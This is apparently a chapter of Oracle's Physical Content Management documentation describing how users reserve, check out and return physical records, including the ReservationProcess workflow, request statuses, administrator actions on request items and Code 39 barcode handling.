Yeah indeed a lot times there’s a solution but not a how to reach it write up or something like that so def keep coming with the process writes up for sure !! :)
That was one thing I found interesting about this process. Most of the time the ideal solution would be created ahead of time and then you would teach that process.
But it's interesting to see how you would think to get to that conclusion on your own.
I think that's the difference between live streams and tutorials. You get to see the thought process, which I really enjoy watching!
Cheers!
🍻
yah that process is fun, we used to do FP lunch sessions at an old job and refactor some current/legacy code into something we just learned or found interesting right on a big screen tv so everyone could watch and we talk thru the process.
Haha, I wrote the same thing and it was so quick that I didn't bother to post it.
I seldomly use any libraries in React, because it's so easy and quick to build them yourself. Just a hand full of small util compnents and you're good to go.
Agreed. Plus the problem with libraries is they have to cover the use cases of every application in the works. Most times your one liner function is enough for your use case.
This.
I couldn't write an equivalent to React-Router or Native-Navigation, but I don't have to. A 10line component covers the use-cases I have.
Reminds me a lot of this component package
I ran into a few different packages that did something very similar. This is the reason I didn't create an npm package. I think there are enough already.
But I thought the process would be fun, which is why I lived streamed it.
Hopefully people enjoy the process that went into making it happen.
Cheers!
🍻
I hope it was fun! Sorry if my comment implied I didn't see value in this, I totally do. I dig seeing the thought process behind the code in addition to the code itself. Have a good one!
No your comment didn't imply that it wasn't fun. I got you ;)
You too!
Very functional and very Elm'ish.
I've watched this talk and it covered exactly that.
Thanks for the tip! I'm saving this video to my Watch Later.
Definitely worth watching. You might find some inspiration on how to improve your React code even more :)
There's always room for improvement!
Your code is subject to race conditions.
See dev.to/sebastienlorber/handling-ap...
You'd rather use a lib that solves it for you with all the edge cases, like github.com/slorber/react-async-hook
Yep this is correct! Any previous
fetchneeds to be aborted.
Since this code was just for fun, I don't think I'll be spending the time to add these cases into it. But if someone wants to contribute a gist, i'll gladly link it.
Cheers!
I'd probably use ReasonReact for this :D
ReactReason is a very interesting project. It's hard to convince large companies to switch to a totally different language though.
I'm still looking forward to playing with ReasonML for some personal projects.
What if you want to render a loader while new data is loading? That means you'd render a loader + the current data at the same time. Same with errors.
Submit a pull request ;)
Scala-js allows writing react components this way
This sounds pretty cool. I haven't seen scalajs but if it has pattern matching I'm down!
First time that I "unicorned" article! Well played Sir!
I'm so honored 😁
Wow!
Cheers!
🍻 | https://practicaldev-herokuapp-com.global.ssl.fastly.net/joelnet/react-i-really-wish-this-is-how-i-could-write-components-1k4j | CC-MAIN-2021-10 | refinedweb | 1,648 | 66.54 |
Shouldn't the getter be named "getPName"?
Dave
(pardon brevity, typos, and top-quoting; on cell)
On Nov 2, 2012 1:09 AM, "Maliwei" <mlw5415@gmail.com> wrote:
> As I have desc in the mail title, and see the code below:
>
> /**--------------code start----------**/
> import ognl.Ognl;
> import ognl.OgnlException;
> class Hello {
> private String pName;
> public String getpName() {
> return pName;
> }
> public void setpName(String pName) {
> this.pName = pName;
> }
> }
>
> public class OgnlTest {
> public static void main(String[] args) {
> Hello action = new Hello();
> action.setpName("pName.Foo");
> try {
> Object pName = Ognl.getValue("pName", action);
> System.out.println(pName);
> } catch (OgnlException e) {
> //this will happen when use version 2.7+ and 3.x
> e.printStackTrace();
> }
> }
> }
> /**--------------code end----------**/
>
> According to JavaBeans Spec sec 8.8 "Capitalization of inferred names":
> Thus when we extract a property or event name from the middle of an
> existing Java name, we normally convert the first character to lower case.
> However to support the occasional use of all upper-case names, we check if
> the first two characters of the name are both upper case and if so leave it
> alone. So for example,
> “FooBah” becomes “fooBah”
> “Z” becomes “z”
> “URL” becomes “URL”
> We provide a method Introspector.decapitalize which implements this
> conversion rule.
> String java.beans.Introspector.decapitalize(String name)
>.
> Thus "FooBah" becomes "fooBah" and "X" becomes "x", but "URL" stays as
> "URL".
>
>
>
>
>
> Best Regards
> Ma Liwei | http://mail-archives.apache.org/mod_mbox/commons-user/201211.mbox/%3CCADJJoV7uf6GK6AgtahxMzEkyhxPhF7kfMjaVp1oZdeDM3P538A@mail.gmail.com%3E | CC-MAIN-2014-52 | refinedweb | 228 | 59.5 |
Project Euler 66: Investigate the Diophantine equation x2 − Dy2 = 1.
Problem Description.
Analysis
Using the chakravala method for solving minimal solutions to Pell’s Equation. A detailed explanation is posted in the comments section.
Project Euler 66 SolutionRuns < 0.005 seconds in Python 2.7.
from Euler import sqrt, prime_sieve def pell(d): p, k, x1, y, sd = 1, 1, 1, 0, sqrt(d) while k != 1 or y == 0: p = k * (p/k+1) - p p = p - int((p - sd)/k) * k x = (p*x1 + d*y) / abs(k) y = (p*y + x1) / abs(k) k = (p*p - d) / k x1 = x return x L = 1000 print "Project Euler 66 Solution:", max((pell(d),d) for d in prime_sieve
- D=92821 for D ≤ 100000 in 15 seconds.
Solution of “Pell’s Equation” by Chakravala Method by Gopal Menon
It was discovered by Brahmagupta that a triple (a, b, k), representing the equation a2 – Nb2 = k, can be composed with the trivial triple (m, 1, m2 – N) to get a new triple (am + Nb, a + bm, k(m2 – N)). Scaling down by k, using Bhaskara’s lemma, we get,
a2 – Nb2 = k ==> {(am + Nb)/k}2 – N{(a + bm)/k}2 = (m2 – N)/k
The following is the algorithm for solving “Pell’s equation”, x2 – Ny2 = 1, as given by the Indian mathematicians who were the first to solve this equation:
- For the given value of N (which is not a perfect square) replace x by a, y by b and 1 by k and solve the equation a2 – Nb2 = k. Let the initial value of b be 1 and select the initial value of a such that the square of the number is as close to N as possible so as to get the least absolute value of k. Note that k may be either positive or negative but not zero.
- Now select an integer m such that k divides a + bm and the absolute value of m2 – N is minimum.
- Now replace a by the absolute value of (am + Nb)/k and b by the absolute value of (a + bm)/k.
- Now replace k by a2 – Nb2. Note that k may be either positive or negative but not zero.
- If the new value of k is 1 we have got the solution. The value of x is a and that of y is b.
- If the value of k is not equal to 1 we go for the first iteration and repeat steps 1 to 5. We keep on doing this until the value of k becomes 1 and we thus get the values of x and y which satisfies “Pell’s equation” for the given value of N.
- Using Brahmagupta’s lemma, if the value of k assumes a value of -1 or ± 2 for any value of a and b or if the value of k assumes a value of ± 4 and either a or b is an even number, we can stop further iterations and compose the triple with itself to get the final solution.
a2 – Nb2 = k ==> {(a2 + Nb2)/k}2 – N{(ab)/k}2 = 1
An example with N = 53 is given below.
- Since N = 53, we initially select a = 7 and b = 1 to get k = -4.
- We have to now select an integer m such that 4 divides 7 + m and the absolute value of m2 – 53 is minimum. Therefore m should be of the type 4t + 1 for integer values of t. To minimise the absolute value of m2 – 53, m should be 5.
- Hence, in the first iteration we get the new values of a and b as the absolute value of (am + Nb)/k and (a + bm)/k respectively. Thus we get a = (7×5 + 53×1)/4 = 22, b = (7 + 1×5)/4 = 3 and k = (52 – 53)/(-4) = 7.
- In the second iteration we have to select an integer m such that 7 divides 22 + 3m and the absolute value of m2 – 53 is minimum. Therefore m should be of the type 7t + 2 for integer values of t. To minimise the absolute value of m2 – 53, m should be 9.
- The new values of a and b are now the absolute value of (am + Nb)/k and (a + bm)/k respectively. Thus we get a = (22×9 + 53×3)/7 = 51, b = (22 + 3×9)/7 = 7 and k = (92 – 53)/7 = 4.
- In the third iteration we select m = 7 to get the revised values of a = 182, b = 25 and k = -1.
- Since the value of k is now -1, we can use Bhaskara’s lemma an compose the triple with itself. Since a = 182, b = 25 and k = -1, we get x = (1822 + 53×252)/1 = 66249, y = 2x182x25/1 = 9100 and k = 1.
- Thus, the solution to the equation is 662492 – 53 x 91002 = 1.
- From this we can also get the value of √53 as 7.28010989010989. This value differs from the value obtained from the square root function of the spreadsheet by just 0.000000011 %.
- This method always terminates with a solution (when the value of k becomes 1) for all values of N (other than perfect squares).
Just one (dumb) quick question.
Why D has to be prime?
Stranger still is that they are all primes of the form 4k+1. A complete explanation, much better that I could hope to do, is located here:
Will you please explain , how you implement these steps ??
p = k * (p/k+1) – p
p = p – int((p – sd)/k) * k
I added a discussion of the algorithm written by Gopal that explains all the steps required.
Hi Mike,
Sure, it is obvious that these two serve the purpose of ensuring that a + bm (or x1 + py, in your notation) is divisable by k and that m*m – N is minimal. However, it’s really interesting how you made it happen without referring to x1 and y.
If you could explain that, I’d very much appreciate it.
Thanks,
Janko
I solved this problem over a decade ago and then discovered the “Chaka Lacka Boom Boom” (chakravala) method to help improve performance.
The two statements you referenced are a direct result of implementing this algorithm and the following reference provides a good explanation of how it works:
Thanks | https://blog.dreamshire.com/project-euler-66-solution/ | CC-MAIN-2018-09 | refinedweb | 1,056 | 76.35 |
The Practical Client
If you want to ensure that the right code is loaded at the right time (and only loaded when you need it), you can use TypeScript modules to organize your code. As a side benefit, managing your script tags will get considerably easier.
When combined with a module manager, TypeScript modules are great for two reasons. First, modules eliminate the need for you to make sure that you stack your script tags in the right order. Instead, within each script file you specify which other files your code depends on and the module manager establishes the right dependency hierarchy -- in your page, all you need is a single script tag for the code file that kicks everything off.
Second, the module manager loads your code files asynchronously as they're needed. If, as a user works through your application, some code file is never needed, then it will never get hauled down to the browser. Even if your user does use all the code files, deferring loading script files until you need them can significantly improve the loading time for your pages.
I discussed modules in my second Practical TypeScript column in May 2013 (except, back then, the column was called Practical JavaScript and I was using TypeScript 0.8.3). Much has changed in TypeScript since then and now's a good time to revisit the topic because some of those changes are part of the latest version of the language, TypeScript 2.1.
There has been one major change since the first version of TypeScript: What were called "internal modules" in the earliest versions of TypeScript are now called namespaces. TypeScript namespaces act like .NET Framework namespaces and should be used to organize related components (classes, enums and so on) to help developers discover them. This article uses "modules" in the current sense of the term: as a way of managing and loading script resources on an as-needed basis.
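To make the distinction concrete, here is a minimal sketch of a namespace (the names are illustrative, not from any real project). A namespace groups related declarations under one qualifying name for organization and discovery; it has no effect on which script files are loaded or when:

```typescript
// A namespace organizes related components under a single name,
// much like a .NET namespace. It is purely an organizational tool:
// it does not change how or when any file is fetched.
namespace CustomerComponents {
  export enum CustomerTypes { Regular, Premium }

  export class Customer {
    constructor(public Id: string) { }
  }
}

// Consumers qualify member names with the namespace name:
const cust = new CustomerComponents.Customer("A123");
```

Modules, by contrast, are about files and loading, and that is the sense used in the rest of this column.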
Setting Up
For this column I'm using TypeScript 2.1 in Visual Studio 2015. I used NuGet to add RequireJS to my project as my module loader. You don't, however, have to use RequireJS. TypeScript syntax for working with modules is "implementation-neutral": Whatever code you write in TypeScript is translated by the compiler into whatever function calls are required by your module loader. To tell the TypeScript compiler to generate RequireJS-compatible JavaScript code, I added this line to my tsconfig.json file, specifying that I'm using the UMD format, which is compatible with both AMD (the original module definition format, implemented by RequireJS) and CommonJS (which is popular with Node developers):
"module": "umd"
The code in this article works equally well with module set to amd. Angular developers using SystemJS should set module to system (I'm told).
Picking RequireJS does mandate the format of the script tag that I use to start my application. First, of course, I have to add a script tag to my page to load the RequireJS library. However, to cause RequireJS to load my application's initial script file, I must add a data-main attribute to the script tag that references that initial script file. The path to my script file is usually a relative filepath (relative to the location of the RequireJS script file).
For this case study, I put all my files in the Script folder. However, my RequireJS script file is directly in my application's Scripts folder, while my initial script file (CustomerManagement.ts) is in a subfolder called Application. To invoke RequireJS and point it at my initial script file, I add this tag to my page's <head> element:
<script src="Scripts/require.js"
data-</script>
Notice that, no matter how many files I organize my TypeScript code into, I only need a single script tag on each page. When RequireJS loads CustomerManagement.js, it will check to see what files CustomerManagement.js requires and load them (and so on, through the dependency hierarchy).
Creating an Export File
To create a file of useful code that I'd like to be available for use in some other file, all I need to do is create a TypeScript file and add my declarations to it. I add the keyword export to each declaration that I want to use outside the file. Listing 1 shows an example of a CustomerEntities file that exports an enum, a constant, an interface, a base class, a derived class and a function. To make this case study more interesting I put this file in another Scripts subfolder, which I called Utilities.;
}
function MakeNewPremiumCustomer(custId: string): PremiumCustomer {
let pcust: PremiumCustomer;
pcust = new PremiumCustomer();
pcust.Id = custId;
pcust.CreditStatus = defaultCreditStatus;
pcust.CreditLimit = 100000;
return pcust;
}
I could have enclosed my exported components in a module, like this:
export module Customers
{
export enum CreditStatusTypes {
//...rest of module...
However, that module name establishes a qualifier that I'd have to use when referring to any component in the module. For example, in any code that uses CreditStatusTypes enum I'd have to refer to it as Customers.CreditStatusType. That may not seem like a bad thing -- it might even sound helpful because it could help avoid name collisions if you import two modules, both of which contain something called CreditStatusType.
But, as I'll discuss in a later column, you have other options to handle name collisions. As a result, using a module may simply insert another namespace level into your component's names without adding any value. Nor does enclosing all the components in the module save you any code -- you still have to flag each component with the export keyword (as I did with the CreditStatusTypes in my example). I don't use the module keyword in my modules.
Importing Components
Now, in my application code, to create a PremiumCustomer class, I need access to the MakeNewPremiumCustomer function and the PremiumCustomerClass. To get that access, I just add an import statement that imports those components from my module. Because my application code is in a file in my Scripts/Application folder, the import statement it uses (with a relative address pointing to my CustomerEntities module in Scripts/Utilities), looks like this:
import { PremiumCustomer, MakeNewPremiumCustomer } from "../Utilities/CustomerEntities"
By the way, if you've set noUnusedLocal to true in your tsconfig file, then you'll be obliged to use any component you reference in your import statements or your code won't compile.
But I'm not done yet. While I've reduced the mass of script tags that I might need at the start of a page to a single reference to RequireJS, I've only looked at the simplest ways to export and import module components. Next month I'm going to focus on some more architectural issues you should consider when creating modules (along with the code you need to manage those modules, of | https://visualstudiomagazine.com/articles/2017/02/01/managing-modules.aspx | CC-MAIN-2019-13 | refinedweb | 1,153 | 60.24 |
Note: Jon's Radio has moved to InfoWorld
storyList
Jon's homepage
This discussion snippet asks and answers some more questions that I immediately had. In particular, it clarifies that only static HTML is delivered to the public host (which by default is Apache). That explains why there's no built-in search -- it's functionality that's not exportable as static HTML.
That said, let's not sneer at static HTML. In fact, Radio is using a technique that I continue to rely on heavily in managing websites. I call it dynamic generation of statically-served pages.
For example, I put the following into /radio/Macros/test.txt:
on test (s) { return ("<u>" + s + "</u>")}
and then I put this into /radio/www/test.txt
#title "test"<%test ("the sample text")%>
My local server responds to /test.txt like so:
the sample text
And the public server gave the same result in response to /test.html.
When I change the call to:
#title "test"<%test ("some different text")%>
It changed in both places.
However, when I changed the underlying macro to:
on test (s) { return ("<b>(" + s + ")</b>")}
The bolded, rather than underlined, rendering appeared only locally, not on the public server. To force the change to appear on the public side, I tried deleting/recreating /radio/Macros/test.txt. That didn't do it. I did succeed, finally, by deleting/recreating /radio/www/test.txt, the page that uses the macro.
Perhaps there's a synchronization strategy I don't yet understand. Or perhaps there are some kinks to be worked out. But in general, for the kinds of communication that Radio is meant to enable -- collaboration, knowledge management -- the marriage of a dynamic content renderer with a static page server can be highly practical and efficient.
Hmm. The synch issue are interesting. For example, I just changed my navigator.xml to include links to the Radio and RSS categories. They appear on the home page, and on the Radio category page, because these were both refreshed by my last post. However they don't appear on the RSS category page, and won't, I guess, until I route something there that forces a refresh. Is there a "Force Refresh of Everything" option?
Later...OK, found it. It's in the GUI-based tool, rather than the browser-based one. Radio->Publish->Entire Website did the trick.
This observation about no self-hosting was something I noticed right away.
Now I want to recategorize the posting, having decided that the newly-created RSS category is more appropriate than the original Radio category.
Well, fair enough. Radio did not remove:
but did add:
Meanwhile, I am categorizing this item both ways: under Radio and RSS.. | http://radio.weblogs.com/0100887/categories/radio/2002/01/15.html | crawl-002 | refinedweb | 456 | 66.74 |
Asked by:
How to get Odata Response without Etag using Microsoft.AspNet.OData
Question
- User-1243834164 posted
As per my requirement whenever I am calling ODATA V4 controller get request, from ajax I don't want to get Odata.Etag from response.
How can we achieve this. Is there any Web Api Odata server side configuration to disable Etags?
"@odata.context": "",
"@odata.count": 1,
"value": [{
"@odata.etag": "W/\"YmluYXJ5J0FBQUFBRnFFUUE4PSc=\"",Thursday, February 15, 2018 5:20 PM
All replies
- User283571144 posted
Hi evurihanumantharao,How can we achieve this. Is there any Web Api Odata server side configuration to disable Etags?
As far as I know, if don't enable the [TimeStamp] attribute or the [ConcurrencyCheck]attribute in your data model.
It will not add the etag in the response.
So I suggest you could recheck your model to make sure you don't add the attribute.
Here I also create an example with etag in odata v4.
The data model.
public class Person { [Key] public int Id { get; set; } [Required] public string Name { get; set; } [Required] [Timestamp] public int Age { get; set; } }
Result:
If I remove the "[Timestamp]" or " [ConcurrencyCheck]", it will not generate the etag.
Best Regards,
BrandoFriday, February 16, 2018 6:44 AM
- User-1243834164 posted
Thanks for your response.
If I change the TimeStamp/ConcurrencyCheck that will impact on my entity framework behavior. I am looking for the option which can work at Odata Level. I need to eliminate this tag from Odata responses.Wednesday, February 21, 2018 7:27 PM
- User-166373564 posted
Hi,
Either use either the [TimeStamp] attribute or the [ConcurrencyCheck] attribute but not both.
See the "Support for ETags" section in this MSDN blog post.
Regards,
AngieFriday, February 23, 2018 10:01 AM
- User-1101824297 posted
For anyone else stumbling across this post, we found that adding an [IgnoreDataMember] attribute to the property solves this (unless you absolutely need the property with the Timestamp attribute in your response)Wednesday, May 15, 2019 9:18 PM | https://social.msdn.microsoft.com/Forums/en-US/fad7de81-1a19-42b6-807d-96ec300845fa/how-to-get-odata-response-without-etag-using-microsoftaspnetodata?forum=aspwebapi | CC-MAIN-2022-33 | refinedweb | 331 | 65.12 |
Your browser does not seem to support JavaScript. As a result, your viewing experience will be diminished, and you have been placed in read-only mode.
Please download a browser that supports JavaScript, or enable it if it's disabled (i.e. NoScript).
Hello,
I have a unclosed spline with 5 points and an offset from 0 to 1 where 0.0 is on point 0, 0.25 is on point 1, 0.5 on point 2 and so on. I think this is meant as not realoffset. The distances between the points are different. But for example the sweep growth works with real offsets, I guess. How can I convert an notRealOffset into a RealOffset? I tried to use SplineHelp(), but dont get I to work rigth now.
Thx for any hints
rownn
Hi Rownn, thanks for reaching us.
With regard to your question, as pointed out in our documentation you can move back and forth from percentage to unit offset by using:
A few observations now:
Let's see two simple cases:
splineLength: 849.075096635
customLength: 400
lengthRatio (customLength / splineLength): 0.471100850308
GetOffsetFromReal(lengthRatio,0): 0.452809444459
GetOffsetFromUnit(customLength,0): 0.452809444459
splineLength: 845.774079501
customLength: 400
lengthRatio (customLength / splineLength): 0.472939535148
GetOffsetFromReal(lengthRatio,0): 0.472783546885
GetOffsetFromUnit(customLength,0): 0.47278354688
In the second case the ratio expressed by the arbitrary length and the overall curve length matches the offset which is completely correct considering the Uniform option
Let me know if it helps to address your question or if there are further points to better discuss.
Riccardo
EDIT: I've fixed the naming convention the text snippets to make it more readable
Hi Riccardo,
thanks for your detailed reply. I think I will need some more concentration to get it clear. Is lengthRatio=custom/spline length ratio and customLength=custom lenght=400?
I´ll be back with more time.
Thx and greetings
rownn
@rownn: I've fixed the naming convention in the previous post to make it more clear.
Hi,
I´ve fixed it in another way. It isn´t very interesting how, because it is pretty case specific.
I wasn´t able to use the informations above to get it to work, because I wasnt able to get the "customlength" by offset.
But to clarify what I wandet to do here a screenshot:
But thx again
rownn
Hi rownn, thanks for following up.
Can you elaborate more on I wasnt able to get the "customlength" by offset.?
Actually looking at your screenshot and assuming that the red-labelled refers to what you actually consider "wrong" and the green-labelled to the right, I think that the red-labelled is indeed correct since it actually lies in the middle of spline considering that the start point is the top/right vertex.
At the same time, the green-labelled point is the one that you can obtain when passing 0.5 to SplineHelp::GetPosition() which is the 50% of the spline parametrization not of the spline length.
Assuming a linear rectangle is used as shown above the code below shows the behavior I describe:
def main():
sh = c4d.utils.SplineHelp()
sh.InitSpline(op)
splineLength = sh.GetSplineLength()
halfLength = splineLength / 2
midPointOffsetIncorrect = halfLength / splineLength
midPointOffsetFromReal = sh.GetOffsetFromReal(midPointOffsetIncorrect,0)
midPointOffsetFromUnit = sh.GetOffsetFromUnit(halfLength,0)
mtx = c4d.Matrix()
midpointRed = sh.GetPosition(midPointOffsetFromUnit) # which in this case is the same of offsetFromReal
midNullRed = c4d.BaseObject(c4d.Onull)
midNullRed[c4d.ID_BASEOBJECT_USECOLOR] = 2
midNullRed[c4d.ID_BASEOBJECT_COLOR] = c4d.Vector(1,0,0)
midNullRed[c4d.ID_BASELIST_NAME] = "MidRed"
mtx.off = midpointRed
midNullRed.SetMg(mtx)
midpointGreen = sh.GetPosition(midPointOffsetIncorrect)
midNullGreen = c4d.BaseObject(c4d.Onull)
midNullGreen[c4d.ID_BASEOBJECT_USECOLOR] = 2
midNullGreen[c4d.ID_BASEOBJECT_COLOR] = c4d.Vector(0,1,0)
midNullGreen[c4d.ID_BASELIST_NAME] = "MidGreen"
mtx.off = midpointGreen
midNullGreen.SetMg(mtx)
doc.InsertObject(midNullRed)
doc.InsertObject(midNullGreen)
c4d.EventAdd()
Best, Riccardo | https://plugincafe.maxon.net/topic/11281/spline-notrealoffset-to-realoffset/1 | CC-MAIN-2022-05 | refinedweb | 629 | 52.36 |
Physical Content Management offers circulation services for physical content items, in much the same way as a library circulates content. Users can receive items, keep them for a specific period, then return them so they can be stored at their designated location again for someone else to check out. Users can also put a hold on unavailable items. If more than one person makes a reservation request for an item, a waiting list is created, which specifies the order in which people requested the item. Barcode functionality is used in conjunction with reservations to easily track items that are either checked out or requested.
This chapter covers the following topics:
"The Reservation Process"
The following tasks are typically performed when using reservations. These tasks can be performed by users depending on how the system has been set up. Therefore, these tasks are all discussed in the Oracle Fusion Middleware User's Guide for Universal Records Management:
Creating a reservation request
Editing a reservation request
Deleting a reservation request
Searching for reservations
Saving reservation search results
Viewing reservations for physical items
Viewing your own reservation requests
Editing a request item
Canceling a request item
Deleting a request item
Changing the status of a request item
Reservations in Physical Content Management are handled using a special criteria workflow called "ReservationProcess," which is used for approval and notification purposes. This workflow must be configured and enabled. See the Oracle Fusion Middleware Setup Guide for Universal Records Management for details about setting up that workflow.
The reservation workflow is not used if the "Check in internal content item for reservation workflow" setting on the Configure Physical Content Management Page is disabled. Users can still make reservations but e-mail notifications are not received (not even by the system administrator). If this is done, a different procedure to process reservations should be in place.
Users with the predefined PCM Requestor role can make reservations for physical items. Users with the predefined 'pcmadmin' role can also edit and process reservation requests.
By default, if a user submits a reservation request for one or more items, a new content item is checked into the repository in the Reservation security group. If the workflow is enabled, this content item automatically enters the ReservationProcess workflow and the administrator receives a workflow review notification about the request.
Default metadata values can be set to be assigned to the reservation workflow item checked into the repository. See the Oracle Fusion Middleware Setup Guide for Universal Records Management for details.
The person in the administrator role receives e-mail notifications about pending reservations and the requesting user is not notified. Change this behavior by changing the ReservationGroup alias in the User Admin utility. For example, you could set up the workflow to also send e-mail notifications to the user who made the reservation request.
Clicking the Review workflow item link in the notification e-mail opens the Workflow Review for Request page, where the administrator can acknowledge the reservation request. As soon as the administrator clicks the Approve button on this page, the reservation request exits the workflow.
The administrator can then proceed and fulfill the reservation request in accordance with the applicable procedures within the organization.
The reservation process can be modified to suit an organization's need by changing the ReservationProcess workflow. For more information about workflows, see the Oracle Fusion Middleware Application Administrator's Guide for Content Server.
All completed reservation requests are automatically logged in the reservations history. A reservation request is considered completed if none of its request items are still pending (in process), on a waiting list, or checked out.
By default, completed reservation requests are stored in the history log until they are deleted. A log is kept in the audit history table until it is archived.
Limit the maximum number of days a completed request is included in the history by modifying settings on the Configure Physical Content Management Page.
An administrator can view the current reservations history by searching for reservations with the Completed field set to 'Yes'.
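For reference, the retention rule can be sketched as a small purge function. The field names `completed` and `completed_date` are hypothetical; the real system manages this internally based on the configured maximum number of days:

```python
from datetime import datetime, timedelta

def purge_history(requests, max_days, now=None):
    """Keep only completed requests younger than the configured maximum.

    `requests` is a list of dicts with hypothetical fields `completed`
    (bool) and `completed_date` (datetime); pending requests are kept.
    """
    now = now or datetime.now()
    cutoff = now - timedelta(days=max_days)
    return [r for r in requests
            if not r["completed"] or r["completed_date"] >= cutoff]

now = datetime(2024, 1, 31)
history = [
    {"id": 1, "completed": True,  "completed_date": datetime(2024, 1, 1)},
    {"id": 2, "completed": True,  "completed_date": datetime(2024, 1, 30)},
    {"id": 3, "completed": False, "completed_date": None},
]
# Request 1 is older than 7 days and is dropped; 2 (recent) and 3 (pending) remain.
kept = purge_history(history, max_days=7, now=now)
```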
The following is a typical fulfillment process of a reservation request:
A user creates a reservation request for one or more physical items.
As soon as the user submits the reservation request, the status of each requested item is automatically set to "In Process." If it was already "In Process" or "Checked Out," it is set to "Waiting List." See "Request Status", "Transfer Method" and "Priority" for information about data used in reservation requests.
A reservation workflow is initiated and the administrator receives an e-mail notification to review the reservation request.
The administrator acknowledges the reservation request. If any items in the reservation request are not available or should be denied, the administrator can change their status accordingly.
All available requested items (not already checked out) are gathered from their storage location, in accordance with the organization's procedures. During this process, an appropriate transaction barcode is scanned to indicate it is checked out, the requestor's barcode is scanned, and the barcode for the desired item is scanned.
The status of each available requested item is changed to "Checked Out" automatically after the barcode file is uploaded to PCM and the data is synchronized.
When the item's status changes to "Checked Out," its current location (as shown on the Physical Item Information Page) is automatically set to the deliver-to location specified when the reservation request was created. If no deliver-to location was specified, the current location is set to "OTHER." The current location comment on the Physical Item Information Page is set to the location comment specified for the associated reservation request. If no comment was provided, it is set to the login name of the user who made the reservation.
The requesting user can be notified and the reservation fulfilled in accordance with the applicable procedures within the organization. This is not handled by PCM but by the organization.
The user keeps the items for a specific number of days. If a bar code system is in place, after the item is returned, the item's barcode is once again scanned, the barcode for the location of the item's placement is scanned, and a transaction barcode is scanned to indicate the item is checked in and its location.
The status is changed to "Returned" and its current location set to its assigned storage location automatically after the barcode file is uploaded to PCM.
If a waiting list exists for the item, the status for the next requestor on the list should be changed from "Waiting List" to "In Process," so the item can be processed for the user. This can be done manually on any of the reservation pages, but if a barcode scanner is used to scan the item for check-in, it can be done automatically, depending on how the system is configured.
The status of the item continues to be "Returned" until the reservation is deleted. This can be done manually or automatically (after a certain number of days).
Depending on the procedures in place at the site, a charge may be levied for reservations and processing. Chargebacks and billing are discussed in the Oracle Fusion Middleware User's Guide for Universal Records Management.
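The status assignment in step 2 can be sketched as a small helper. The status names are taken from the text; the function itself is illustrative, not the product's code:

```python
def status_on_request(current_status):
    """Status a requested item receives when a reservation is submitted.

    If the item is already being processed or is checked out for someone
    else, the new request goes on the waiting list; otherwise it is
    processed immediately.
    """
    if current_status in ("In Process", "Checked Out"):
        return "Waiting List"
    return "In Process"

status_on_request(None)           # idle item -> "In Process"
status_on_request("Checked Out")  # item is with another user -> "Waiting List"
```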
Each reservation request has several properties, including the following:
The request status specifies the current status for a reserved physical item, which can be any of the following:
Waiting List: The request item is currently checked out to someone else. It becomes available to the next requestor on the waiting list upon its return (unless waiting lists have been disabled in the system configuration).
Returned: The checked-out item was returned to the storage repository, so it is available for other users to reserve and check out.
A reservation request is considered completed if none of its request items are still pending (in process), on a waiting list, or checked out (including overdue).
The PCM.Reservation.Process right is required to change the status of a reservation request item. By default, this right is assigned to the predefined 'pcmadmin' role.
The transfer method specifies how the person who made the request (the requestor) will receive the reserved item. Users specify the transfer method when they create a reservation request.
E-mail: The content item will be e-mailed to its intended recipient.
The default transfer method is set on the Configure Physical Content Management Page.
The priority of a reservation request specifies the urgency with which it needs to be fulfilled. Users specify the priority when they create a reservation request; the default priority is set on the Configure Physical Content Management Page.
If you are an administrator, you can perform actions on a request item to change its status as part of the reservation fulfillment process. These actions are accessible through the Action menu for a request item on the Reservation Search Results Page or the Items for Request page. You can also perform the actions on multiple items simultaneously using the Actions menu on the Items for Request page.
Not all actions may be available for a particular request item, depending on the item's current status. For example, if the item is currently checked out, it can only be deleted or returned.
The following actions are supported:
Delete: Deletes an item from a reservation request. If deleted, the request for that item is not included in the reservation log. The item is no longer in the item list for the reservation request. This option is available only if the system has been set up to allow users to delete items from a reservation request. In addition, requested items can be deleted only by a user with the PCM.Reservation.Delete right (assigned to the predefined PCM Administrator role by default).
Deny: Rejects the reservation request for an item. The item remains part of the reservation request, but it will not be provided to the requestor.
Not Found: Changes the status of an item because it could not be located in its designated location. The item remains part of the reservation request, but it cannot currently be provided to the requestor.
Unavailable: Changes the status of an item because it cannot currently be processed for delivery. The item remains part of the reservation request, but it cannot currently be provided to the requestor.
Cancel: Cancels the reservation request for an item before it is fulfilled. If a request item is canceled, the request for that item is still included in the reservation log (the item is still on the item list for the reservation, with its status set to "canceled"). Request items can be canceled only by users with the PCM.Reservation.Edit right (assigned to the predefined 'pcmadmin' role by default). Only request items with the "In Process" status can be canceled.
Check Out: Changes the status of an item because it was handed off to its intended recipient, who can now keep the item for the configured checkout period.
Returned: Changes the status of a checked-out item because it was returned to the storage repository, making it available again for other users to reserve and check out.
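The actions above map onto status changes that can be sketched as a small transition table. The action and status names come from this list; which actions are legal in which status is inferred from the text (for example, a checked-out item can only be returned, and only "In Process" items can be canceled), and the Delete action, which removes the item from the request entirely, is omitted:

```python
# Status each action assigns (names taken from the list above).
ACTION_STATUS = {
    "Deny": "Denied",
    "Not Found": "Not Found",
    "Unavailable": "Unavailable",
    "Cancel": "Canceled",
    "Check Out": "Checked Out",
    "Returned": "Returned",
}

# Which actions are legal for an item in a given status (an assumption
# based on the text; "Delete" is handled separately since it removes
# the item from the request rather than changing its status).
LEGAL = {
    "In Process":  {"Deny", "Not Found", "Unavailable", "Cancel", "Check Out"},
    "Checked Out": {"Returned"},
}

def apply_action(status, action):
    """Return the new status, or raise if the action is not allowed."""
    if action not in LEGAL.get(status, set()):
        raise ValueError(f"{action!r} not allowed while {status!r}")
    return ACTION_STATUS[action]

s = apply_action("In Process", "Check Out")  # -> "Checked Out"
s = apply_action(s, "Returned")              # -> "Returned"
```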
Barcode files are generated by barcode devices which scan storage information contained in barcodes located on physical content items or storage containers. A barcode is a machine-readable symbol used to store bits of data. In the context of physical content management, they can be used for purposes of identification, inventory, tracking, and reservation fulfillment.
Barcodes can be printed on labels attached to physical content items or storage containers holding such items (for example, a box). This helps track their location and status. User labels can also be created which help process reservation requests by users.
Important: View barcode reports using HTML, but print reports using PDF to ensure proper formatting.
The following technical information applies to barcodes in PCM:
Physical Content Management uses the Code 3 of 9 barcoding standard (also called Code 39). This is a widely used standard for alphanumeric barcodes that can store upper-case characters, decimal numbers, and some punctuation characters (dash, period, dollar sign, slash, percent sign, and plus symbol).
All lower-case letters are automatically converted to upper case. For example, if a user login is 'jsmith' then its barcode value is 'JSMITH'.
